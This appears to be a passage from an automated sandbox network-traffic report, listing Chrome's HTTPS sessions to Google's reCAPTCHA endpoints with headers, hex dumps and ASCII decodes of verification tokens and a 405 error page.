                                                                                                                                                                                                                                                                  2024-10-29 19:10:43 UTC1070INData Raw: 4e ca 18 e7 3c 57 ce 46 e2 ea 76 db 1f 99 26 cf 9f 72 fc cd d8 9c f0 0f 27 b7 b0 af ab bc 43 e1 0d 1f 57 f0 bd c5 c5 ac cf 75 0c c8 5a 5d ae 2e a7 04 a2 e1 83 e7 2a 72 a3 81 eb 8f 5a e7 fc 2f e0 9d 3b 40 d1 e1 b8 b3 6b 83 1c 92 be f3 3c 43 f7 6d 18 c1 60 ce bc 63 a6 7b 7e 35 ca a7 3c 3c 5d 97 33 6b fa d4 2a d5 75 92 6d 5a dd 6e 7c e5 65 67 a9 b4 c2 28 ad 6e da 57 01 81 58 8b 6f c0 c1 6c 60 92 07 1d 0e 39 38 cd 76 de 1e f0 0e bb 7f aa 7d 8f ec cd a6 db e4 49 25 cd d4 82 24 c1 e8 71 d5 ba 8f 97 df b7 35 ec 37 68 92 59 ef 94 4e 52 50 63 59 76 67 ce 70 39 1c 70 07 20 f3 c1 cf 39 15 59 62 2d 33 46 23 8f ca 0a 08 28 e7 0c 7b 7d e3 8e 70 71 c7 ae 0d 64 f3 6a 97 5e ed bf ae e7 33 b4 5f be af e5 fd 58 e9 7c 1b e0 9d 1b c1 d1 23 d8 88 ee 6e b6 94 96 f0 29 2e eb b4
                                                                                                                                                                                                                                                                  Data Ascii: N<WFv&r'CWuZ].*rZ/;@k<Cm`c{~5<<]3k*umZn|eg(nWXol`98v}I%$q57hYNRPcYvgp9p 9Yb-3F#({}pqdj^3_X|#n).
                                                                                                                                                                                                                                                                  2024-10-29 19:10:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  88192.168.2.1649819142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC996OUTPOST /recaptcha/api2/userverify?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 9658
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC9658OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 34 5a 70 72 35 4a 55 6c 7a 38 41 74 32 4b 78 35 6d 6d 77 43 51 6b 35 56 76 59 41 50 31 31 73 67 30 7a 6e 57 4e 75 66 47 4c 41 38 6e 69 4b 46 65 4b 33 31 37 6a 53 38 48 59 32 2d 38 6d 75 32 73 2d 55 30 47 6f 50 31 70 5a 41 59 4c 46 70 41 44 2d 6d 55 6c 58 64 55 75 2d 58 72 4e 4b 71 73 75 46 32 51 39 4f 30 4b 76 62 49 4b 75 52 32 50 31 43 68 68 44 75 63 5f 37 6c 62 50 75 66 4a 68 74 42 6f 59 63 50 37 52 34 72 43 47 55 37 36 5f 7a 66 65 4a 49 4a 73 6e 31 54 41 37 77 77 4e 71 7a 70 72 62 79 6e 74 6c 6a 45 65 4b 45 52 52 52 72 2d 79 6b 6f 69 66 7a 48 71 44 69 4c 43 74 53 57 78 5a 6b 55 6d 61 79 5f 32 33 68 4d 5a 43 6b 52 36 4e 63 53 49 62 4b 62 58 68
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA4Zpr5JUlz8At2Kx5mmwCQk5VvYAP11sg0znWNufGLA8niKFeK317jS8HY2-8mu2s-U0GoP1pZAYLFpAD-mUlXdUu-XrNKqsuF2Q9O0KvbIKuR2P1ChhDuc_7lbPufJhtBoYcP7R4rCGU76_zfeJIJsn1TA7wwNqzprbyntljEeKERRRr-ykoifzHqDiLCtSWxZkUmay_23hMZCkR6NcSIbKbXh
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC838INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:52 GMT
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC540INData Raw: 33 66 37 62 0d 0a 29 5d 7d 27 0a 5b 22 75 76 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 74 71 39 57 56 50 69 4c 47 42 38 44 41 67 5a 54 43 33 67 6e 75 6c 38 37 50 72 73 35 43 74 4c 55 73 75 6f 34 78 6b 55 65 68 75 43 59 67 33 67 6f 4b 47 34 56 46 36 4e 6f 74 44 41 45 76 34 75 6f 74 79 4a 55 6d 75 48 72 72 78 4a 70 30 68 50 6b 43 65 39 49 69 6a 57 58 4a 66 34 54 68 75 41 6e 6a 44 4d 34 4a 79 79 35 59 53 46 61 79 79 6e 35 4a 73 72 69 53 4e 57 73 34 7a 65 74 66 61 44 64 45 30 37 56 45 62 61 30 30 73 6d 56 36 30 44 6e 56 31 31 6e 43 54 43 52 73 48 66 76 7a 4e 5f 6c 62 6a 30 45 37 5f 4f 54 46 6d 70 39 30 69 70 4d 6f 48 4c 44 52 33 63 43 35 74 36 69 73 50 4e 6f 49 44 51 68 36 45 64 38 59 62 5a 38 49 75 77 42 36 59 79 33 43 61 48 74 4b 58 32 55 68 62 65 49
                                                                                                                                                                                                                                                                  Data Ascii: 3f7b)]}'["uvresp","03AFcWeA5tq9WVPiLGB8DAgZTC3gnul87Prs5CtLUsuo4xkUehuCYg3goKG4VF6NotDAEv4uotyJUmuHrrxJp0hPkCe9IijWXJf4ThuAnjDM4Jyy5YSFayyn5JsriSNWs4zetfaDdE07VEba00smV60DnV11nCTCRsHfvzN_lbj0E7_OTFmp90ipMoHLDR3cC5t6isPNoIDQh6Ed8YbZ8IuwB6Yy3CaHtKX2UhbeI
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC1378INData Raw: 77 51 55 33 42 61 4f 39 37 52 74 57 42 6a 5a 51 78 2d 58 6f 78 54 4c 65 6e 4f 68 52 45 4d 5f 48 52 7a 45 30 4a 65 4e 6e 45 6f 74 4a 32 2d 30 33 73 79 73 6a 6e 67 35 6e 5f 5a 53 44 63 4d 53 38 64 39 46 6e 4b 6f 52 46 4a 76 54 66 53 76 42 31 57 44 48 65 78 67 59 71 49 56 70 61 4b 68 7a 70 55 5f 50 4a 6f 63 49 36 6d 76 2d 44 77 71 6f 46 76 32 47 36 74 4a 69 49 2d 56 67 53 6c 6f 53 4e 52 69 78 69 4c 47 46 4c 32 6d 34 56 48 63 49 64 74 79 48 65 65 48 39 55 47 36 35 68 50 70 62 49 57 45 5f 46 57 55 55 4c 61 77 62 54 50 4c 43 2d 47 6a 2d 6b 32 74 51 63 51 4e 33 5a 4f 61 49 76 43 51 35 67 63 74 4e 56 36 5f 48 41 52 79 2d 57 74 4b 54 34 73 67 44 57 64 4e 79 65 4f 36 70 53 78 4c 42 4f 68 2d 2d 4d 53 49 43 42 47 54 4a 74 4b 44 73 33 64 30 47 62 71 56 79 5f 73 37 4f
                                                                                                                                                                                                                                                                  Data Ascii: wQU3BaO97RtWBjZQx-XoxTLenOhREM_HRzE0JeNnEotJ2-03sysjng5n_ZSDcMS8d9FnKoRFJvTfSvB1WDHexgYqIVpaKhzpU_PJocI6mv-DwqoFv2G6tJiI-VgSloSNRixiLGFL2m4VHcIdtyHeeH9UG65hPpbIWE_FWUULawbTPLC-Gj-k2tQcQN3ZOaIvCQ5gctNV6_HARy-WtKT4sgDWdNyeO6pSxLBOh--MSICBGTJtKDs3d0GbqVy_s7O
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC1378INData Raw: 56 59 79 56 36 37 5a 51 6d 61 74 38 77 75 45 68 4d 4b 4f 62 47 4f 47 78 58 5f 49 79 45 74 6e 4b 35 39 6f 4d 62 66 6b 39 63 57 32 66 68 53 42 62 4f 6f 41 6c 31 41 6a 74 4b 30 71 50 68 72 50 48 78 72 65 51 6b 51 4d 42 4f 74 52 6e 44 79 50 36 77 54 69 31 6b 36 34 4d 67 5a 45 6f 61 52 62 4d 42 42 71 72 61 6a 64 2d 4d 45 70 61 6c 6d 72 5a 4a 71 72 6e 56 78 46 61 68 63 34 44 49 31 49 4c 6d 7a 58 47 36 59 49 58 6a 61 45 4c 48 70 4c 5f 75 32 39 4e 6a 61 51 56 41 77 35 42 6e 34 6d 6c 53 6c 67 4f 66 42 72 7a 2d 53 55 62 52 57 4f 78 49 48 75 47 36 4d 53 51 49 58 5a 53 78 4c 51 6c 48 41 6f 46 66 77 6e 31 31 56 34 48 2d 42 76 6c 77 6b 6b 35 33 4f 4b 46 6f 6b 46 67 67 52 57 58 7a 70 77 4f 44 43 72 5f 46 47 70 53 39 76 74 5a 4e 45 72 43 61 6d 52 34 37 4d 53 6e 73 58 61
                                                                                                                                                                                                                                                                  Data Ascii: VYyV67ZQmat8wuEhMKObGOGxX_IyEtnK59oMbfk9cW2fhSBbOoAl1AjtK0qPhrPHxreQkQMBOtRnDyP6wTi1k64MgZEoaRbMBBqrajd-MEpalmrZJqrnVxFahc4DI1ILmzXG6YIXjaELHpL_u29NjaQVAw5Bn4mlSlgOfBrz-SUbRWOxIHuG6MSQIXZSxLQlHAoFfwn11V4H-Bvlwkk53OKFokFggRWXzpwODCr_FGpS9vtZNErCamR47MSnsXa
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC1378INData Raw: 56 53 6f 4c 73 6c 61 63 39 4a 73 2d 4f 41 4e 6c 76 4d 37 6f 33 72 58 73 52 6d 6a 5f 51 7a 49 56 73 6e 75 69 4f 73 75 72 45 4e 39 77 35 59 30 4c 34 71 63 36 76 66 58 6c 70 7a 61 57 62 4e 6e 33 4e 55 53 78 43 53 56 35 75 31 52 71 37 6b 4e 6f 7a 43 69 31 4b 33 65 36 47 67 59 78 50 33 52 62 47 41 38 57 69 59 7a 49 46 47 71 4c 38 6c 45 59 58 72 4b 44 45 4d 42 5f 67 4f 50 47 42 77 74 6d 39 62 53 72 4c 68 4b 55 45 2d 5f 59 54 53 48 53 76 55 65 75 43 37 74 55 53 43 51 34 69 75 39 51 50 4a 42 56 31 50 4b 30 45 5a 7a 75 4b 6f 4d 59 34 47 7a 4d 4b 61 77 47 71 63 73 37 6d 72 53 45 36 56 72 61 32 63 30 5a 59 65 66 34 6e 38 39 75 59 79 61 45 64 6c 58 71 31 67 50 2d 71 66 55 49 4d 30 52 33 51 6a 75 48 32 32 32 63 36 45 72 6e 66 50 32 6c 6a 73 71 42 36 66 30 4d 6b 4c 39
                                                                                                                                                                                                                                                                  Data Ascii: VSoLslac9Js-OANlvM7o3rXsRmj_QzIVsnuiOsurEN9w5Y0L4qc6vfXlpzaWbNn3NUSxCSV5u1Rq7kNozCi1K3e6GgYxP3RbGA8WiYzIFGqL8lEYXrKDEMB_gOPGBwtm9bSrLhKUE-_YTSHSvUeuC7tUSCQ4iu9QPJBV1PK0EZzuKoMY4GzMKawGqcs7mrSE6Vra2c0ZYef4n89uYyaEdlXq1gP-qfUIM0R3QjuH222c6ErnfP2ljsqB6f0MkL9
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC1378INData Raw: 78 6b 79 63 70 6d 58 34 4d 58 51 34 45 30 37 42 6a 6b 34 72 58 63 4c 72 78 58 44 55 31 41 66 71 54 68 56 6b 6d 6c 2d 63 65 34 55 32 48 75 44 46 45 4b 31 58 59 42 38 7a 62 58 42 46 39 75 58 37 67 72 77 78 54 6c 32 61 4b 5a 70 39 44 78 73 4a 61 57 6d 45 42 51 31 57 4c 74 5f 61 4e 50 73 57 65 49 6f 30 4a 5a 4c 35 48 65 53 4c 42 51 4b 72 69 61 75 43 5f 6d 62 6d 54 70 73 41 4d 59 5f 41 6e 53 35 36 75 32 4b 5a 66 54 64 56 4a 54 59 43 45 5f 5f 35 5f 6c 65 6c 36 7a 46 74 6d 50 71 6f 41 71 55 65 41 62 78 4c 4a 54 39 6b 6e 6c 7a 42 44 38 5a 4a 37 30 71 4e 2d 30 4d 4d 46 65 35 78 30 6d 39 51 70 33 35 34 66 62 67 42 70 4c 38 33 52 7a 62 6c 78 33 35 43 4f 70 2d 54 41 43 73 39 34 77 6f 57 48 56 56 4f 4e 41 66 6a 41 35 4b 35 63 6b 62 62 53 72 53 39 53 53 2d 34 63 49 6e
                                                                                                                                                                                                                                                                  Data Ascii: xkycpmX4MXQ4E07Bjk4rXcLrxXDU1AfqThVkml-ce4U2HuDFEK1XYB8zbXBF9uX7grwxTl2aKZp9DxsJaWmEBQ1WLt_aNPsWeIo0JZL5HeSLBQKriauC_mbmTpsAMY_AnS56u2KZfTdVJTYCE__5_lel6zFtmPqoAqUeAbxLJT9knlzBD8ZJ70qN-0MMFe5x0m9Qp354fbgBpL83Rzblx35COp-TACs94woWHVVONAfjA5K5ckbbSrS9SS-4cIn
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC1378INData Raw: 67 57 78 39 5f 56 42 6a 64 34 39 6e 45 6b 65 64 65 51 71 57 31 4a 52 39 32 44 79 71 35 39 37 6e 47 38 31 72 41 48 65 49 58 38 76 74 45 6b 36 77 6f 72 36 6a 6d 6c 7a 46 73 49 44 6e 4f 47 6c 68 72 5a 59 53 35 76 66 55 65 63 45 5a 64 57 78 48 74 69 50 4b 31 79 6a 44 74 37 4b 65 62 5f 64 34 4d 79 64 6e 6b 48 6d 5a 73 4e 72 70 7a 79 37 43 6f 64 6a 74 57 4e 31 4f 36 32 70 4f 51 59 4d 75 75 47 73 53 65 33 32 55 61 30 48 70 38 4f 33 59 4b 50 4c 59 63 50 4f 76 51 50 53 4c 74 50 37 4b 49 36 6a 46 46 76 71 74 52 56 74 70 65 55 72 55 6a 68 64 36 43 48 64 7a 42 53 72 68 74 74 66 37 6a 79 76 57 4f 51 6b 6e 4e 6f 49 6e 76 6d 77 70 38 55 50 41 67 62 75 78 4d 68 33 39 72 44 6b 67 77 79 5a 44 78 58 71 65 71 36 62 7a 65 76 57 2d 2d 51 78 63 6a 61 74 42 50 32 33 39 58 6d 54
                                                                                                                                                                                                                                                                  Data Ascii: gWx9_VBjd49nEkedeQqW1JR92Dyq597nG81rAHeIX8vtEk6wor6jmlzFsIDnOGlhrZYS5vfUecEZdWxHtiPK1yjDt7Keb_d4MydnkHmZsNrpzy7CodjtWN1O62pOQYMuuGsSe32Ua0Hp8O3YKPLYcPOvQPSLtP7KI6jFFvqtRVtpeUrUjhd6CHdzBSrhttf7jyvWOQknNoInvmwp8UPAgbuxMh39rDkgwyZDxXqeq6bzevW--QxcjatBP239XmT
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC1378INData Raw: 68 6e 52 37 6d 32 58 6d 54 31 47 32 64 65 72 54 41 46 42 46 2d 31 6e 39 50 67 74 79 67 39 74 54 56 63 65 57 32 48 46 71 34 2d 34 48 34 56 43 56 35 7a 7a 56 69 6c 56 39 2d 45 78 4b 42 6c 6c 54 75 31 5f 64 4f 74 4d 6e 62 6c 38 2d 59 76 48 6d 7a 62 37 43 4b 53 57 35 79 66 33 34 53 33 6b 4b 37 64 74 39 4e 70 74 69 4f 42 73 4a 41 78 68 53 74 6d 37 51 7a 41 57 4d 30 43 50 57 57 2d 63 4e 68 50 43 4c 62 78 72 69 74 5a 51 71 42 71 38 51 4b 41 35 5a 34 77 34 74 58 31 35 31 56 32 6d 33 7a 63 7a 79 6b 4b 56 72 4b 6b 53 33 68 51 6f 56 67 78 4f 54 61 63 43 74 63 4e 45 32 73 65 78 6e 57 62 38 74 56 4e 5f 63 35 30 4e 7a 71 37 74 43 34 34 64 35 38 74 77 43 34 77 68 62 52 54 66 47 54 4c 48 33 75 34 66 6f 65 42 68 5f 4d 41 7a 6c 5a 6c 47 32 4a 77 4e 46 59 63 34 42 38 68 71
                                                                                                                                                                                                                                                                  Data Ascii: hnR7m2XmT1G2derTAFBF-1n9Pgtyg9tTVceW2HFq4-4H4VCV5zzVilV9-ExKBllTu1_dOtMnbl8-YvHmzb7CKSW5yf34S3kK7dt9NptiOBsJAxhStm7QzAWM0CPWW-cNhPCLbxritZQqBq8QKA5Z4w4tX151V2m3zczykKVrKkS3hQoVgxOTacCtcNE2sexnWb8tVN_c50Nzq7tC44d58twC4whbRTfGTLH3u4foeBh_MAzlZlG2JwNFYc4B8hq
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC1378INData Raw: 41 47 4a 35 74 48 57 4d 37 41 74 6c 4c 74 51 4d 4b 77 6c 6a 76 65 4c 76 73 63 6a 2d 45 61 6d 4f 79 57 41 48 6f 31 32 66 31 33 48 35 59 77 59 61 49 55 5f 73 47 45 38 6a 42 6b 63 78 74 62 4c 66 34 35 75 46 51 51 54 73 55 44 4f 52 6d 4b 35 64 51 74 6e 48 74 4e 4d 47 6c 35 67 57 56 4d 76 6d 4a 63 30 4a 7a 4f 49 76 31 31 46 6c 34 69 31 42 4e 64 46 78 6d 59 70 58 76 2d 4e 70 50 56 30 74 38 55 54 5a 44 36 43 50 6f 5f 68 57 66 51 79 34 44 70 51 31 31 66 30 6c 42 48 79 30 34 2d 52 52 47 67 52 5a 69 35 6e 58 32 6c 56 38 47 73 4b 61 2d 41 63 43 76 4a 37 5a 37 45 4e 32 5f 6f 79 44 4a 5f 6c 45 58 36 39 4b 70 73 61 47 76 48 38 67 44 43 62 4d 58 6c 58 4c 4e 4e 6f 57 4d 59 50 43 4a 4e 53 4a 36 58 57 47 52 4c 51 33 72 35 4a 41 63 4b 35 4f 5a 51 67 67 46 71 50 75 42 6e 30
                                                                                                                                                                                                                                                                  Data Ascii: AGJ5tHWM7AtlLtQMKwljveLvscj-EamOyWAHo12f13H5YwYaIU_sGE8jBkcxtbLf45uFQQTsUDORmK5dQtnHtNMGl5gWVMvmJc0JzOIv11Fl4i1BNdFxmYpXv-NpPV0t8UTZD6CPo_hWfQy4DpQ11f0lBHy04-RRGgRZi5nX2lV8GsKa-AcCvJ7Z7EN2_oyDJ_lEX69KpsaGvH8gDCbMXlXLNNoWMYPCJNSJ6XWGRLQ3r5JAcK5OZQggFqPuBn0
                                                                                                                                                                                                                                                                  2024-10-29 19:10:52 UTC1378INData Raw: 32 69 31 77 6a 5f 64 6e 39 37 65 6c 43 31 51 6f 6a 50 6d 51 33 41 34 65 51 4a 31 53 32 75 5f 4a 6f 42 53 61 74 37 7a 65 35 5a 77 32 35 59 4a 6d 70 76 4e 4c 6d 31 35 31 49 74 4b 30 5f 58 76 45 2d 42 36 41 59 49 53 46 76 49 6e 57 68 6a 7a 4e 78 50 59 46 75 37 70 6f 32 35 56 72 62 6c 46 53 31 75 35 2d 6c 56 50 71 61 71 7a 72 6f 46 58 31 73 62 4e 43 30 42 54 46 47 71 70 64 6e 2d 4b 48 73 71 44 2d 2d 69 47 54 68 6c 78 32 32 63 4c 63 70 79 57 53 69 7a 65 79 2d 47 50 5a 33 65 71 54 42 36 46 79 46 67 70 4e 41 2d 6d 69 57 65 63 48 65 42 6f 53 75 78 6b 55 65 34 74 57 44 59 43 49 33 47 6d 6b 65 52 31 34 32 77 65 4a 56 30 63 68 72 61 69 4f 6a 78 30 35 67 74 39 52 4a 52 50 69 66 66 78 4c 37 48 49 48 6e 6a 30 68 4e 46 67 79 64 56 69 78 71 74 45 36 70 42 51 71 6f 43 53
                                                                                                                                                                                                                                                                  Data Ascii: 2i1wj_dn97elC1QojPmQ3A4eQJ1S2u_JoBSat7ze5Zw25YJmpvNLm151ItK0_XvE-B6AYISFvInWhjzNxPYFu7po25VrblFS1u5-lVPqaqzroFX1sbNC0BTFGqpdn-KHsqD--iGThlx22cLcpyWSizey-GPZ3eqTB6FyFgpNA-miWecHeBoSuxkUe4tWDYCI3GmkeR142weJV0chraiOjx05gt9RJRPiffxL7HIHnj0hNFgydVixqtE6pBQqoCS


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  89192.168.2.1649820142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:53 UTC610OUTGET /recaptcha/api2/userverify?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:54 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:10:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  90192.168.2.1649821142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
